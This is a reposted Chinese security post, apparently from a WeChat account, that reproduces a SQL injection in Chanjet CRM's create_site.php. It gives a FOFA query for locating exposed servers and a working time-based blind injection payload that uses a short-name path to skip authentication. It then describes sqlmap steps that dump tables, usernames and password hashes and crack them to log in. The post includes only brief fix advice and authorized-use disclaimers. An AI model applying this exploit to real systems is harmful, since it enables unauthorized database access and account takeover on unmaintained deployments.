漏洞简介
用友畅捷CRMcreate_site.php处存在SQL时间盲注,未对后台功能做有效的身份认证与用户的输入进行安全过滤,导致在权限绕过可直接访问后台存在SQL注入漏洞的缺陷路径,攻击者可以利用该漏洞获取网站后台数据库敏感信息,进一步利用可接管服务器权限。
FOFA语句
用友畅捷CRMcreate_site.php处存在SQL时间盲注,未对后台功能做有效的身份认证与用户的输入进行安全过滤,导致在权限绕过可直接访问后台存在SQL注入漏洞的缺陷路径,攻击者可以利用该漏洞获取网站后台数据库敏感信息,进一步利用可接管服务器权限。
FOFA语句
app
=
"畅捷通-畅捷CRM"
漏洞复现
首先验证是否存在漏洞
http
//:your-ip:port/WebSer~1/create_site.php?site_id=1
出现如图的弹窗,则漏洞存在
构造payload
GET
/WebSer~1/create_site.php?site_id=1+AND+
%28
SELECT+6663+FROM+
%28
SELECT
%28
SLEEP
%285
%29
%29
%29
Jdzn
%29
HTTP/1.1
1.通过sqlmap爆破表名
2.爆破字段名
3.爆破字段内容
4.用户名、密码
爆破成功,MD5解码,成功登入:
修复建议
畅捷通CRM版本官方已经不再维护,建议受影响的用户收敛系统仅内网访问或部署WAF
本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!
原文始发于微信公众号(巢安实验室):畅捷通CRM SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论